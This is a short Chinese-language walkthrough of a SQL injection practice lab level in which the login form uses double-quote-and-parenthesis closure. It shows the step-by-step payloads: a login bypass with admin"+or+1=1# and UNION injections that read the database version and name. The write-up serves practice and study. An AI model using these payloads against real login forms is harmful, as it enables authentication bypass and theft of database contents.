知识点：

• 一般字符型注入分类
  • 单引号闭合
  • 双引号闭合
• 这是一个双引号闭合

看界面又是一个输入框的注入;通过admin admin进行登录发现页面还是有回显

直接使用万能密码尝试

构造payload:username=admin'or1=1

没有任何反应；可能是没加注释符的关闭

构造username=admin'or+1=1#

发现还是没有任何回显信息；第一反应是特殊字符过滤？？；或许是单引号的问题

使用双引号试一下

构造payload:username=admin"or+1=1

发现有了报错信息；发现原始语句应该是where username=("输入内容") and passwd=

好好好；知道了原始语句就可以绕过了

构造payload:username=admin"+or+1=1#

页面成功打印出了用户信息

接下来尝试进行联合注入

构造payload:username=a"+union+select+1,2#

成功打印出了输入的信息

接下来获取对应数据库的版本信息和数据库名

构造payload:username=a"+union+select+version(),database()#

成功获取了数据库名和版本信息；

到这里就结束了；具体的敏感信息就不获取了，实际操作和第十一关一样

10